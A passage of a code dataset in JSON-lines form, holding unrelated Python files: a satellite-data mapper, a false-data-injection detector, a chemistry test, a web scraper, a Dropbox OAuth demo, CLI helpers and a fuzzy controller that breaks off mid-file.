The reason for that is that the items in source_data\n are not in the GCMD keywords but rather refer to products of certain instruments. If you\n search the internet for the dictionary keys, you'll find a dataset description which\n includes the listed platforms and instruments.\n \"\"\"\n pi = {\n 'AVHRR18_G-NAVO-L2P-V1.0': [pti.get_gcmd_platform('noaa-18'),\n pti.get_gcmd_instrument('avhrr-3')],\n 'AVHRR19_G-NAVO-L2P-V1.0': [pti.get_gcmd_platform('noaa-19'),\n pti.get_gcmd_instrument('avhrr')],\n 'AVHRR_SST_METOP_B-OSISAF-L2P-V1.0': [pti.get_gcmd_platform('metop-b'),\n pti.get_gcmd_instrument('avhrr')],\n 'VIIRS_NPP-OSPO-L2P-V2.3': [pti.get_gcmd_platform('suomi-npp'),\n pti.get_gcmd_instrument('viirs')],\n 'AMSR2-REMSS-L2P-V07.2': [pti.get_gcmd_platform('gcom-w1'),\n pti.get_gcmd_instrument('amsr2')],\n 'GOES13-OSISAF-L3C-V1.0': [pti.get_gcmd_platform('goes-16'),\n pti.get_gcmd_instrument('abi')],\n 'SEVIRI_SST-OSISAF-L3C-V1.0': [pti.get_gcmd_platform('msg'),\n pti.get_gcmd_instrument('seviri')],\n 'OSISAF_ICE': [pti.get_gcmd_platform('earth observation satellites'),\n pti.get_gcmd_instrument('Imaging Spectrometers/Radiometers')],\n 'NCEP_ICE': [pti.get_gcmd_platform('ncep-gfs'),\n pti.get_gcmd_instrument('computer')],\n 'AMSRE': [pti.get_gcmd_platform('aqua'), pti.get_gcmd_instrument('amsr-e')],\n 'ATS_NR_2P': [pti.get_gcmd_platform('envisat'), pti.get_gcmd_instrument('aatsr')],\n 'AVHRR18_G': [pti.get_gcmd_platform('noaa-18'), pti.get_gcmd_instrument('avhrr-3')],\n 'AVHRR17_NAR': [pti.get_gcmd_platform('noaa-17'), pti.get_gcmd_instrument('avhrr')],\n 'AVHRR18_NAR': [pti.get_gcmd_platform('noaa-18'), pti.get_gcmd_instrument('avhrr-3')],\n 'SEVIRI': [pti.get_gcmd_platform('msg'), pti.get_gcmd_instrument('seviri')],\n 'TMI': [pti.get_gcmd_platform('trmm'), pti.get_gcmd_instrument('tmi')],\n }\n pi_list = []\n # Here, we may have a dilemma: for example, the dataset at\n # https://opendap.jpl.nasa.gov:443/opendap/OceanTemperature/ghrsst/data/L4/GLOB/UKMO/OSTIA/2008/002/20080102-UKMO-L4HRfnd-GLOB-v01-fv02-OSTIA.nc.bz2\n # has source data AVHRR18_G and AVHRR18_NAR. I don't know the difference between them but\n # presume both are noaa18/AVHRR-3. It means duplication. 
Might not be a problem in Nansat,\n # though, and it could be easy to solve in django-geo-spaas...\n for source_data in ds.source_data.split(','):\n pi_list.append(pi[source_data.strip()])\n return pi_list\n\n","repo_name":"nansencenter/nansat","sub_path":"nansat/mappers/mapper_opendap_ostia.py","file_name":"mapper_opendap_ostia.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"} +{"seq_id":"42010934023","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.linalg import norm\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nfrom scripts.Utility_Functions import utility_functions\n\nclass FPDM:\n \n def __init__(self, data, fpdm_model, lookback = 48, threshold = 0.4):\n self.data = data\n self.fpdm_model = fpdm_model\n self.lookback = lookback\n self.threshold = threshold\n pass\n \n def predict(self, model, batch):\n pass\n \n def barplot_for_specific_fdi(self, real_data, predicted_data, atk_vector_indx):\n inv_scaled_real_data = self.data.inv_scale(real_data)\n injected_data = self.data.inject_fixed_attackvec(inv_scaled_real_data, atk_vector_indx)\n injected_data = self.data.scale(injected_data)\n #injeted_data = injected_data[self.lookback:]\n print('injected_data shape == {}'.format(injected_data.shape))\n errors = abs(real_data - predicted_data)\n errors_fdi = abs(injected_data - predicted_data)\n t_err = [norm(i) for i in errors]\n t_err_fdi = [norm(i) for i in errors_fdi]\n utility_functions.show_barplot(data_list = [t_err, t_err_fdi], label = ['real','anomaly'], n_bins= 50)\n \n def get_forecasting_errors(self, real_data, predicted_data):\n predictions = self.data.inv_scale(predicted_data)\n real = self.data.inv_scale(real_data)\n mae = utility_functions.MAE(real, predictions)\n mse = utility_functions.MSE(real,predictions)\n rmse = utility_functions.RMSE(real,predictions)\n print('mae : {}, mse : {}, rmse : {}'.format(mae,mse,rmse))\n \n \n def is_fdi(self, real_data, predicted_data, threshold):\n errors = abs(real_data - predicted_data)\n fdi = []\n for i in errors:\n if norm(i)> threshold:\n fdi.append(1)\n else:\n fdi.append(0)\n return np.array(fdi)\n \n \n def get_prf(self, real_data, predicted_data, threshold):\n \n fdi = self.is_fdi(real_data, predicted_data, threshold)\n actual = np.zeros((real_data.shape[0],)) #calculating confusion matrix with only real data\n cm0 = confusion_matrix(actual,fdi, labels = [0,1])\n\n inv_scaled_real_data = self.data.inv_scale(real_data)\n injected_data, _ = self.data.inject_random_attackvec(inv_scaled_real_data)\n injected_data = self.data.scale(injected_data)\n \n fdi = self.is_fdi(injected_data, predicted_data, threshold)\n actual = np.ones((real_data.shape[0],))\n cm1 = confusion_matrix(actual,fdi, labels = [0,1])\n \n cm= cm0 + cm1 #adding confusion matrix with Fdi data\n return np.array(utility_functions.cm2prf(cm.T)), cm.T\n \n \n ","repo_name":"gcsarker/XTM","sub_path":"scripts/FPDM.py","file_name":"FPDM.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37510967585","text":"\"\"\"Test CCD code against pyscf's ccd hack\"\"\"\nimport openfermion as of\nfrom qcpanop.cc.ccd import CCD\n\n\ndef test_ccd():\n from pyscf import gto, scf, cc\n from openfermionpyscf import run_pyscf\n\n geometry = [['H', (0., 0., 0.)], ['B', (0., 0., 1.6)]]\n mol = gto.M(\n atom=geometry,\n basis='cc-pvdz')\n\n mf = 
scf.RHF(mol).run()\n\n mycc = cc.CCSD(mf)\n mycc.frozen = 1\n old_update_amps = mycc.update_amps\n\n def update_amps(t1, t2, eris):\n t1, t2 = old_update_amps(t1, t2, eris)\n return t1 * 0, t2\n\n mycc.update_amps = update_amps\n mycc.kernel()\n\n print('CCD correlation energy', mycc.e_corr)\n\n\n molecule = of.MolecularData(geometry=mol.atom,\n basis=mol.basis,\n charge=mol.charge,\n multiplicity=mol.spin + 1)\n molecule = run_pyscf(molecule)\n cc = CCD(molecule=molecule)\n cc.solve_for_amplitudes()\n print('NCR-CCD energy ', cc.ccd_energy + molecule.nuclear_repulsion)\n print('NCR-CCD correlation energy ', cc.ccd_energy + molecule.nuclear_repulsion - cc.scf_energy)\n\n cc.pccd_solve()\n print('NCR-pCCD energy ', cc.ccd_energy + molecule.nuclear_repulsion)\n print('NCR-pCCD correlation energy ', cc.ccd_energy + molecule.nuclear_repulsion - cc.scf_energy)\n\n from qcpanop.cc.pccd import pCCD\n pccd = pCCD(molecule=molecule)\n pccd.compute_energy()\n\n\nif __name__ == \"__main__\":\n test_ccd()","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/cc/projective_cc/ccd_test.py","file_name":"ccd_test.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35991763124","text":"from django.urls import path\nfrom .import views\n\napp_name='customer'\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('products/', views.products, name=\"products\"),\n path('profile/', views.profile, name=\"profile\"),\n path('payment/', views.payment, name=\"payment\"),\n \n]","repo_name":"AATHIRAKEDHARAM/cybershop","sub_path":"customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71648045313","text":"import json\nimport time\n\nimport scrapy\nfrom bs4 import BeautifulSoup\n\n\n\n\nclass WalmartFoodBrowseSpider(scrapy.Spider):\n name = \"walmart_food_browse\"\n products = []\n def start_requests(self):\n\n base_url = 'https://www.walmart.com/browse/food/976759?page={page}'\n page = 1\n while True:\n url = base_url.format(page=page)\n yield scrapy.Request(url=url, callback=self.parse_result)\n page += 1\n time.sleep(1)\n if page == 26:\n break\n with open(\"../../../data/products.json\", \"w\") as f:\n json.dump(self.products, f)\n\n def parse_result(self, response):\n soup = BeautifulSoup(response.text, 'html.parser')\n data = soup.find_all('script', attrs={'id':'searchContent'})\n\n for d in data:\n contents = d.contents\n if len(contents) == 0:\n continue\n results = json.loads(contents[0])\n items = results[\"searchContent\"][\"preso\"][\"items\"]\n self.products.extend(items)\n\n\n\n def parse(self, response):\n page = response.url.split(\"/\")[-2]\n filename = 'quotes-%s.html' % page\n with open(filename, 'wb') as f:\n f.write(response.body)\n\n self.log('Saved file %s' % filename)","repo_name":"kforti/scraping_engine","sub_path":"product_page_scrapers/product_page_scrapers/spiders/walmart_food_browse_spider.py","file_name":"walmart_food_browse_spider.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39775842611","text":"from socket import socket\n\n\ndef main():\n # 默认就是创建TCP Socket\n with socket() as tcp_socket:\n # 连接服务器(没有返回值)\n tcp_socket.connect((\"127.0.0.1\", 8080))\n\n print(\"Connected TCP Server...\") # 连接提示\n\n # 发送消息(返回发送的字节数)\n 
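# (translation of the comment above: send a message; send() returns the number of bytes sent)\n 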
tcp_socket.send(\"小张生日快乐~\\n\".encode(\"utf-8\"))\n # 接收消息\n msg = tcp_socket.recv(1024)\n print(f\"服务器:{msg.decode('utf-8')}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/6.net/2.TCP/1.tcp_client.py","file_name":"1.tcp_client.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"21681154114","text":"#!/usr/bin/env python\n\nimport webapp2\nimport httplib2\nimport urllib\nimport json\nimport base64\nimport random\nimport time\nimport hmac\nimport binascii\nimport hashlib\nimport logging\nimport jinja2\nimport os\nfrom google.appengine.api import users\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n #self.session['twitter_user'] = False\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n template_values = {\n 'user': user,\n 'url': url,\n 'url_linktext': url_linktext\n }\n\n template = JINJA_ENVIRONMENT.get_template('jinja_template.html')\n self.response.write(template.render(template_values))\n\n\n\n\n\n#############\n## DROPBOX ##\n#############\n\nclass BaseHandler(webapp2.RequestHandler):\n\n def dispatch(self):\n # Get a session store for this request.\n self.session_store = sessions.get_store(request=self.request)\n\n try:\n # Dispatch the request.\n webapp2.RequestHandler.dispatch(self)\n finally:\n # Save all sessions.\n self.session_store.save_sessions(self.response)\n\n @webapp2.cached_property\n def session(self):\n # Returns a session using the default cookie key.\n return self.session_store.get_session()\n\nconfig = {}\nconfig['webapp2_extras.sessions'] = {'secret_key': 'my-super-secret-key'}\n\n\n\n\ndropbox_app_key='kq1dnywotn5al03'\ngae_callback_url='https://etxetemp.appspot.com/oauth_callbackDropbox'\ndropbox_app_secret=''\n\nclass LoginAndAuthorizeDropbox(webapp2.RequestHandler):\n def get(self):\n\n url='https://www.dropbox.com/1/oauth2/authorize'\n parametroak= {'response_type':'code',\n 'client_id':dropbox_app_key,\n 'redirect_uri':gae_callback_url\n }\n parametroak=urllib.urlencode(parametroak)\n self.redirect(url + '?' 
+ parametroak)\n\n\n\nclass OAuthCallbackDropbox(BaseHandler):\n    def get(self):\n        request_url= self.request.url\n        code=request_url.split('code=')[1]\n\n        http=httplib2.Http()\n        metodoa='POST'\n        url='https://api.dropbox.com/1/oauth2/token'\n        parametroak={'code':code,\n                     'grant_type': 'authorization_code',\n                     'client_id': dropbox_app_key,\n                     'client_secret':dropbox_app_secret,\n                     'redirect_uri':gae_callback_url}\n\n        parametroak=urllib.urlencode(parametroak)\n        erantzuna, edukia=http.request(url, metodoa,body=parametroak, headers={})\n\n        #self.response.write(edukia)\n\n        json_edukia= json.loads(edukia)\n        self.session['access_token']=json_edukia['access_token']\n        self.redirect('/welcomePageDropbox')\n\n\n\n\nclass WelcomePageDropbox(BaseHandler):\n    def get(self):\n        access_token=self.session['access_token']\n\n        http=httplib2.Http()\n        method='PUT'\n        path='/karpeta/fitxategia.txt'\n        url='https://api-content.dropbox.com/1/files_put/auto' + path\n        parametroak={'overwrite':'false'}\n        parametroak=urllib.urlencode(parametroak)\n        goiburuak={}\n        goiburuak['Authorization']='Bearer ' + access_token\n        edukia='Hau fitxategiaren eduki da,,, probaa'\n        resp, content = http.request(url + '?' + parametroak, method, body=edukia, headers=goiburuak)\n\n        self.response.write('Egiaztatu zure Dropbox kontuan fitxategia sortu dela')\n\n\napp = webapp2.WSGIApplication([\n    ('/', MainHandler),\n    ('/LoginAndAuthorizeDropbox', LoginAndAuthorizeDropbox),\n    ('/oauth_callbackDropbox', OAuthCallbackDropbox),\n    ('/welcomePageDropbox', WelcomePageDropbox)\n], debug=True)\n","repo_name":"xapraiz/etxetemp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23419351471","text":"f_in = open(\"A-small-attempt0.in\", 'r')\r\nf_out = open(\"a_real.out\", 'w')\r\n\r\ndef get_int():\r\n    return int(f_in.readline().rstrip())\r\n\r\ndef get_row(n):\r\n    grid = []\r\n    for i in range(0, 4):\r\n        grid.append(f_in.readline().rstrip())\r\n    return grid[n-1].split()\r\n\r\nn = get_int()\r\n\r\nfor case in range(1, n + 1):\r\n    first_row_n = get_int()\r\n    first_row = get_row(first_row_n)\r\n    \r\n    second_row_n = get_int()\r\n    second_row = get_row(second_row_n)\r\n\r\n    shared = [i for i in first_row if i in second_row]\r\n\r\n    result = \"MEOW\"\r\n\r\n    if len(shared) == 1:\r\n        result = shared[0]\r\n    elif len(shared) == 0:\r\n        result = \"Volunteer cheated!\"\r\n    else:\r\n        result = \"Bad magician!\"\r\n\r\n    f_out.write(\"Case #{0}: {1}\\n\".format(case, result))\r\n\r\nf_in.close()\r\nf_out.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/586.py","file_name":"586.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42533972237","text":"\"\"\"\nExtends argparse.ArgumentParser with a facility for configuring subcommands by convention.\nEach subcommand lives in its separate Python module.\nThe name of the subcommand is the module name (without superpackage names)\nwith underscore replaced by dash.\nTo be a subcommand module, a module must have \n\nmeaning = \"some help text for the subcommand\"\ndef add_arguments(parser: ArgumentParser): ... # configure the subcommand's sub-parser\ndef execute(args: argparse.Namespace): ... 
# run the subcommand\n\nThe module can also optionally have:\n\naliases = [\"subcmd-alias1\", \"subcmd-alias2\"] # optional.\n\nfor calling the same subcommand by a different name (e.g. an abbreviation).\n\nTo use the mechanism, create the parser as usual and then call the submodule scanner:\n\nparser = ArgumentParser(epilog=explanation)\nparser.scan(\"mysubcmds.subcmd1\", \"mysubcmds.subcmd2\") # or provide module object instead of str\nargs = parser.parse_args()\nparser.execute_subcommand(args) # or supply nothing, then parse_args() will be called internally\n\nThe mechanism uses only one sub-parser group (which is rarely a relevant limitation).\nIt will execute importlib.import_module() on all modules mentioned in a scan() call as strings. \nMultiple calls to scan() are allowed, each can have one or more arguments.\nscan(..., strict=True) will exit when encountering a non-subcommand-module.\nSubcommands cannot be nested, there is only one level of subcommands.\n\"\"\"\n\n\nimport argparse\nimport glob\nimport importlib\nimport os.path\nimport re\nimport sys\nimport typing as tg\nimport warnings\n\n\nmoduletype = type(argparse)\nfunctiontype = type(lambda: 1)\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.subparsers = self.add_subparsers(parser_class=argparse.ArgumentParser,\n dest='subcommand', required=True)\n self.subcommand_modules = dict() # map subcommand name to module\n\n def scan(self, *modules, strict=False, trace=False):\n for module in modules:\n # ----- obtain module and names:\n if isinstance(module, str):\n if module.endswith(\".*\"):\n self.scan_submodules(module[:-2], strict=strict, trace=trace)\n continue\n else:\n module = importlib.import_module(module) # turn str into module\n if not isinstance(module, moduletype):\n warnings.warn(f\"scan() arguments must be str or module: {module} {type(module)} ignored.\")\n continue # skip non-modules. 
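\n            # (added note) at this point 'module' is guaranteed to be a module object:\n            # string arguments were imported via import_module() above, and anything\n            # else was skipped with a warning.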
\n module_fullname = module.__name__ # includes superpackages\n mm = re.search(r\"\\.?(\\w+)$\", module_fullname) # match last component or entire name\n module_name = mm.group(1)\n subcommand_name = module_name.replace(\"_\", \"-\")\n # ----- check for subcommand module:\n required_attrs = (('meaning', str), \n ('execute', functiontype), \n ('add_arguments', functiontype))\n if self._misses_any_of(module, required_attrs):\n if strict:\n print(f\"{module_name} is not a proper subcommand module\")\n sys.exit(1)\n else:\n if trace:\n print(f\"'{module_fullname}' is not a subcommand module\")\n continue # silently skip modules that are not proper subcommand modules\n if trace:\n print(f\"'{module_fullname}' found\")\n # ----- configure subcommand:\n self.subcommand_modules[subcommand_name] = module\n aliases = module.aliases if hasattr(module, 'aliases') else []\n for alias in aliases:\n self.subcommand_modules[alias] = module\n subparser = self.subparsers.add_parser(subcommand_name, help=module.meaning,\n aliases=aliases)\n module.add_arguments(subparser)\n\n def scan_submodules(self, modulename: str, strict=False, trace=False):\n if trace:\n print(f\"scan_submodules('{modulename}')\")\n module = importlib.import_module(modulename) # turn str into module\n file_name = module.__file__\n if file_name is None:\n raise ValueError(f\"'{modulename}' must lead to a directory with an __init__.py\")\n directory = os.path.dirname(file_name)\n for pyfile in glob.glob(os.path.join(directory, \"*.py\")):\n submodulebasename = os.path.basename(pyfile)[:-3] # last component without suffix\n if submodulebasename.startswith(\"_\"):\n continue # skip __init__py and anything that would become an option name\n submodulename = f\"{modulename}.{submodulebasename}\"\n self.scan(submodulename, strict=strict, trace=trace)\n\n def execute_subcommand(self, args: tg.Optional[argparse.Namespace] = None):\n if args is None:\n args = self.parse_args()\n self.subcommand_modules[args.subcommand].execute(args)\n\n @staticmethod\n def _misses_any_of(module: moduletype, required: tg.Sequence[tg.Tuple[str, type]]) -> bool:\n for name, _type in required:\n module_elem = getattr(module, name, None)\n if not module_elem or not isinstance(module_elem, _type):\n return True # this is not a subcommand-shaped submodule\n return False\n","repo_name":"serqco/qscript-framework","sub_path":"argparse_subcommand.py","file_name":"argparse_subcommand.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26801039120","text":"from siptrackdlib.objectregistry import object_registry\nfrom siptrackdlib import treenodes\nfrom siptrackdlib import attribute\nfrom siptrackdlib import template\nfrom siptrackdlib import config\nfrom siptrackdlib import permission\nfrom siptrackdlib import errors\nfrom siptrackdlib import storagevalue\nfrom siptrackdlib.network import ipv4\nfrom siptrackdlib.network import ipv6\n\nvalid_protocols = ['ipv4', 'ipv6']\n\nclass NetworkTree(treenodes.BaseNode):\n class_id = 'NT'\n class_name = 'network tree'\n\n def __init__(self, oid, branch, protocol = None):\n super(NetworkTree, self).__init__(oid, branch)\n self._protocol = storagevalue.StorageValue(self, 'network-protocol', protocol)\n\n def _created(self, user):\n super(NetworkTree, self)._created(user)\n if self._protocol.get() not in valid_protocols:\n raise errors.SiptrackError('unknown network protocol')\n self._protocol.commit()\n\n def _loaded(self, data = 
None):\n super(NetworkTree, self)._loaded(data)\n if data != None:\n self._protocol.preload(data)\n\n def getFreeNetwork(self, range_start, range_end, user):\n \"\"\"Find a free network somewhere between range_start and range_end\n\n If an available network is found it is created and returned.\n range_start and range_end can either be address strings or\n Address objects of the appropriate type.\n \"\"\"\n range_start = self.addressFromString(range_start)\n range_end = self.addressFromString(range_end)\n if self.protocol == 'ipv4':\n return ipv4.get_free_network(self, range_start, range_end, user)\n elif self.protocol == 'ipv6':\n return ipv6.get_free_network(self, range_start, range_end, user)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def addNetwork(self, user, address):\n \"\"\"Create a network appropriate for the trees protocol.\n \n Simple convenience function.\n \"\"\"\n if self.protocol == 'ipv4':\n parent = ipv4.find_network_parent(self, address)\n node = parent.add(user, 'ipv4 network', address)\n elif self.protocol == 'ipv6':\n parent = ipv6.find_network_parent(self, address)\n node = parent.add(user, 'ipv6 network', address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n modified = [node] + list(node.listChildren())\n return node, modified\n\n def addRange(self, user, range):\n \"\"\"Create a range appropriate for the trees protocol.\n \n Simple convenience function.\n \"\"\"\n if self.protocol == 'ipv4':\n parent = ipv4.find_range_parent(self, range)\n return parent.add(user, 'ipv4 network range', range)\n elif self.protocol == 'ipv6':\n parent = ipv6.find_range_parent(self, range)\n return parent.add(user, 'ipv6 network range', range)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def networkExists(self, address):\n \"\"\"Check if a network exists.\n\n address can be either a string or an Address object.\n \"\"\"\n if self.protocol == 'ipv4':\n if ipv4.get_network(self, address):\n return True\n elif self.protocol == 'ipv6':\n if ipv6.get_network(self, address):\n return True\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def getNetwork(self, address):\n \"\"\"Return a network or None if it doesn't exist.\n\n address can be either a string or an Address object.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.get_network(self, address)\n elif self.protocol == 'ipv6':\n return ipv6.get_network(self, address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def getRange(self, range):\n \"\"\"Return a network range or None if it doesn't exist.\n\n range can be either a string or a Range object.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.get_range(self, range)\n elif self.protocol == 'ipv6':\n return ipv6.get_range(self, range)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n return False\n\n def addressFromString(self, address):\n \"\"\"Convert an address string to an Address object.\n\n If an Address object is passed in it will be returned untouched.\n \"\"\"\n if self.protocol == 'ipv4':\n return ipv4.address_from_string(address)\n if self.protocol == 'ipv6':\n return ipv6.address_from_string(address)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def isValidAddressString(self, address):\n if self.protocol == 'ipv4':\n try:\n if 
ipv4.address_from_string(address):\n return True\n except errors.SiptrackError:\n pass\n elif self.protocol == 'ipv6':\n try:\n if ipv6.address_from_string(address):\n return True\n except errors.SiptrackError:\n pass\n return False\n\n def iterMissingNetworks(self):\n if self.protocol == 'ipv4':\n return ipv4.iter_missing_networks_from_tree(self)\n elif self.protocol == 'ipv6':\n return ipv6.iter_missing_networks_from_tree(self)\n else:\n raise errors.SiptrackError('confused, invalid protocol in network tree?')\n\n def _get_protocol(self):\n return self._protocol.get()\n\n def _set_protocol(self, val):\n self._protocol.set(val)\n protocol = property(_get_protocol, _set_protocol)\n\n# Add the objects in this module to the object registry.\no = object_registry.registerClass(NetworkTree)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(ipv4.Network)\no.registerChild(ipv4.NetworkRange)\no.registerChild(ipv6.Network)\no.registerChild(ipv6.NetworkRange)\no.registerChild(template.NetworkTemplate)\no.registerChild(config.ConfigValue)\no.registerChild(permission.Permission)\n\n","repo_name":"sii/siptrackd","sub_path":"siptrackdlib/network/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13899220766","text":"import argparse\nfrom pgmigrate2 import api\nimport sys\n\n\n\ndef init(args):\n api.init_db(args.DBURL)\n \ndef migrate(args):\n return api.migrate(args.REPO, args.DBURL)\n\ndef check(args):\n return api.check_status(args.REPO, args.DBURL)\n \ndef newpatch(args):\n return api.newpatch(args.REPO)\n\ndef main():\n parser = argparse.ArgumentParser(description='Database Migrations.')\n subparsers = parser.add_subparsers(title='subcommands',\n description='valid subcommands')\n \n parser_init = subparsers.add_parser('init', help='Initialize database with migration tracking.')\n parser_init.add_argument('DBURL', type=str, help='database connection URL')\n parser_init.set_defaults(func=init)\n\n parser_patch = subparsers.add_parser('newpatch', help='Create a new patch')\n parser_patch.add_argument('REPO', type=str, help='path to patch repo')\n parser_patch.set_defaults(func=newpatch)\n\n parser_check = subparsers.add_parser('check', help='Check migration status')\n parser_check.add_argument('REPO', type=str, help='path to patch repo')\n parser_check.add_argument('DBURL', type=str, help='database connection URL')\n parser_check.set_defaults(func=check)\n\n parser_migrate = subparsers.add_parser('migrate', help='Apply outstanding migrations')\n parser_migrate.add_argument('REPO', type=str, help='path to patch repo')\n parser_migrate.add_argument('DBURL', type=str, help='database connection URL')\n parser_migrate.add_argument('--dry-run', action='store_true', default=False, help='do not change anything')\n parser_migrate.set_defaults(func=migrate)\n\n \n args = parser.parse_args()\n \n retcode = args.func(args)\n \n sys.exit(retcode or 0) \n \nif __name__ == '__main__':\n main() ","repo_name":"mpapierski/pgmigrate2","sub_path":"pgmigrate2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19999562542","text":"from numpy import max\nfrom decimal import *\nfrom math import sin, cos, pi\n\nclass fuzzyControl(object):\n def __init__(self):\n return\n\n def control(self, mdl):\n state = 
mdl.getState()\n position = state[0]\n inclination = state[1]\n linear_vel = state[2]\n angular_vel = state[3]\n\n # -------------------------------------------------------------\n # Inclination\n # -------------------------------------------------------------\n # Negative membership determination for inclination\n if inclination <= -0.1:\n negative_th = 1\n elif -0.1 < inclination < 0:\n negative_th = -10 * inclination\n else:\n negative_th = 0\n\n # Zero membership determination for inclination\n if -0.1 < inclination < -0.03:\n zero_th = -(100/7) * inclination + 10/7\n elif -0.03 <= inclination <= 0.03:\n if inclination<=0:\n zero_th= 1#+inclination\n else:\n zero_th=1-inclination\n elif 0.03 < inclination < 0.1:\n zero_th = (100 / 7) * inclination + 10 / 7\n else:\n zero_th = 0\n\n # Positive membership determination for inclination\n if inclination <= 0:\n positive_th = 0\n elif 0 < inclination < 0.1:\n positive_th = 10 * inclination\n else:\n positive_th = 1\n\n # -------------------------------------------------------------\n # Angular Velocity\n # -------------------------------------------------------------\n # Negative membership determination for angluar velocity\n if angular_vel <= -0.1:\n negative_thd = 1\n elif -0.1 < angular_vel < 0:\n negative_thd = -10 * angular_vel\n else:\n negative_thd = 0\n\n # Zero membership determination for angluar velocity\n if -0.15 < angular_vel < -0.03:\n zero_thd = -(100/12) * angular_vel + 15/12\n elif -0.03 <= angular_vel <= 0.03:\n if angular_vel<=0:\n zero_thd = 1#+angular_vel\n else:\n zero_thd = 1 - angular_vel\n elif 0.03 < angular_vel < 0.15:\n zero_thd = (100/12) * angular_vel + 15/12 # 1/(0.15-0.03)(que é = 8.333 = 100/12) * angular_vel + 0.15/(0.12-0.03)= 1.25 = 15/12\n else:\n zero_thd = 0\n\n # Positive membership determination for angular velocity\n if angular_vel <= 0:\n positive_thd = 0\n elif 0 < angular_vel < 0.1:\n positive_thd = 10 * angular_vel\n else:\n positive_thd = 1\n\n ######################## novas regras\n\n # -------------------------------------------------------------\n # Position\n # -------------------------------------------------------------\n # Negative membership determination for position\n if position <= -2:\n negative_x = 1\n elif -2 < position < 0:\n negative_x = -0.5 * position\n else:\n negative_x = 0\n\n # Zero membership determination for position\n if -1.5 < position < -0.5:\n zero_x = -position + 1.5\n elif -0.5 <= position <= 0.5:\n if position<=0:\n zero_x=1# + position\n else:\n zero_x=1-position\n elif 0.5 < position < 1.5:\n zero_x = position + 1.5\n else:\n zero_x = 0\n\n # Positive membership determination for position\n if position <= 0:\n positive_x = 0\n elif 0 < position < 2:\n positive_x = 0.5 * position\n else:\n positive_x = 1\n\n # -------------------------------------------------------------\n # Linear Velocity\n # -------------------------------------------------------------\n # Negative membership determination for linear velocity\n if linear_vel <= -3:\n negative_xd = 1\n elif -3 < linear_vel < 0:\n negative_xd = -(1/3) * linear_vel\n else:\n negative_xd = 0\n\n # Zero membership determination for linear velocity\n if -1.5 < linear_vel < -0.5:\n zero_xd = linear_vel + 1.5\n elif -0.5 <= linear_vel <= 0.5:\n if linear_vel<=0:\n zero_xd=1#+linear_vel\n else:\n zero_xd=1-linear_vel\n elif 0.5 < linear_vel < 1.5:\n zero_xd = linear_vel + 1.5\n else:\n zero_xd = 0\n\n # Positive membership determination for angular velocity\n if linear_vel <= 0:\n positive_xd = 0\n elif 0 < 
